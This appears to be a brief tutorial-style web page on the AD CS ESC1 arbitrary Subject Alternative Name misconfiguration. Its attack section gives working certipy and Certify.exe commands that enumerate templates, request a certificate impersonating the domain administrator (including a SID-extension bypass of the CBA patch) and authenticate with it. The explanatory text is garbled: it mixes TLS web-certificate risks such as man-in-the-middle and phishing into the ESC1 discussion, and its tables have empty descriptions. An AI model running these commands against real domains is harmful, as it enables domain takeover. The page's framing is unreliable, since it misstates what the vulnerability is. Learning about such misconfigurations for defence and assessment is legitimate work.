What is the Subject Alternative Name (SAN)?
Arbitrary Subject Alternative Name (SAN) vulnerability is a security concern related to the X.509 certificate standard used in the Transport Layer Security (TLS) protocol.
The Subject Alternative Name field in a certificate allows multiple hostnames to be associated with a single public key.
Table of Contents
This is particularly useful in scenarios where a server may have multiple domain names or subdomains.
AD CS ESC1 – Security Risks
Active Directory Certificate Services (AD CS) is crucial for providing public key infrastructure (PKI) functionalities, but it harbors security risks.
Significant among these is the escalation of privileges through misconfigurations, allowing attackers to issue fraudulent certificates or impersonate users.
Additionally, the complexity and maintenance requirements of AD CS make it vulnerable to emerging threats if not properly monitored and updated.
Security Risk Description Man-in-the-Middle Attacks Attackers can exploit the vulnerability to intercept and modify communication between users and the affected server, compromising the confidentiality and integrity of the transmitted data. Phishing Attacks Malicious actors may use a certificate with an arbitrary SAN to impersonate a legitimate website, tricking users into providing sensitive information, leading to potential data breaches or fraud. Domain Hijacking By manipulating the SAN field, attackers might attempt to take control of a domain or subdomain associated with the certificate, posing a threat to the availability and integrity of online services. Unauthorized Access An exploited SAN vulnerability can potentially lead to unauthorized access to sensitive systems or information, compromising the overall security posture of the affected network or infrastructure.
ESC1 Requirements
| Req | Description |
|---|---|
| ENROLLEE_SUPPLIES_SUBJECT | |
| Manual approvals disable | |
| Authorization signatures | |
| Enrollment Rights | |
List of necessary EKUs
| EKU | OID | Description |
|---|---|---|
| Client Authentication | 1.3.6.1.5.5.7.3.2 | |
| PKINIT Client Authentication | 1.3.6.1.5.2.3.4 | |
| Smart Card Logon | 1.3.6.1.4.1.311.20.2.2 | |
| Any Purpose | 2.5.29.37.0 | |
| no EKU | SubCA | |
Attacking Arbitrary Subject Alternative Name- ESC1
1. Find a Valid Template
certipy find -u [email protected] -p Passw0rd -dc-ip 192.168.160.5
2. Request Certificate as Administrator
certipy req -username [email protected] -password Passw0rd -ca corp-DC-CA -target ca.ad-attacks.local -template User -upn administrator@ad-attacks.local -dns dc.ad-attacks.local3. Connect using the new Administrator Certificate
certipy auth -pfx Administrator.pfx -dc-ip 192.168.160.5CBA Patch
Certify.exe request /ca:cbp-dc.protectedcb.corp\CBP-CA /template:ProtectedUserAccess /altname:administrator
/sidextension:S-1-5-21-1286082170-882298176-404569034-500 /domain:protectedcb.corpConclusion
The Arbitrary SAN Vulnerability poses a substantial risk to encrypted communications, potentially allowing attackers to bypass encryption safeguards.
By understanding, detecting, and preventing this vulnerability, organizations can better protect their data integrity and confidentiality in the face of evolving cyber threats.
ADCS Certified Enterprise Security Professional
Offshore is a real-world enterprise environment that features a wide range of modern Active Directory flaws and misconfigurations.
